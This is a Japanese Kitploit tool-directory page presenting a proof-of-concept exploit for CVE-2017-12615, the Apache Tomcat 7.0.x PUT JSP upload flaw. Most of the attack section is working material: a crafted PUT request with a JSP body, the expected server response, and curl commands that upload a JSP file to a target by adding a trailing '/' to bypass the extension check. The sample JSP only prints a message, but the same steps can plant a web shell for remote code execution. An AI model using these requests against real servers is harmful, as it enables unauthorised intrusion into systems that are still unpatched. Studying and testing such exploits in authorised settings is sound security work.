Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-12615 — Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP 脆弱性のPOCエクスプロイト。 | Kitploit
ツール/GitHubGitHub/breaktoprotect/cve-2017-12615
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP 脆弱性のPOCエクスプロイト。

リポジトリを見る
112213年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

In memory of Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

Windows上で動作するApache Tomcat 7.0.0から7.0.79を対象としたPOCエクスプロイトです。CVE-2017-12615 PUT JSP脆弱性。

説明:

設計上、Apache TomcatサーバーではPUTメソッドによるJSPファイルのアップロードは許可されていません。 これはおそらく、攻撃者がJSPシェルをアップロードしてサーバー上でリモートコード実行を取得するのを防ぐためのセキュリティ対策です。 しかし、チェックが不十分なため、攻撃者は特別に細工されたHTTPリクエストを使用してTomcatサーバーにPUTメソッドを要求することで、PUTが有効になっている7.0.{0 to 79} Tomcatサーバー上でリモートコード実行を取得できる可能性があります。でも、本当に特別ですか?お願いしますよ。

エクスプロイト方法:

ファイル名の拡張子の後ろに「/」文字を追加することで、ファイル拡張子チェックを回避できます。それだけです。つまり、実際にはそれほど特別ではありません。

リクエストメソッドでのエクスプロイト:

リクエスト

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

成功した場合の期待されるレスポンス

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

curlを使用したエクスプロイト:

  1. .jspファイルを作成します(例:test.jsp):
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. 対象サーバーに対してcurlコマンドを実行します:
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. 対象アドレスにブラウジングしてファイルがアップロードされたか確認するか、次のコマンドを実行します:
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
ツールをダウンロード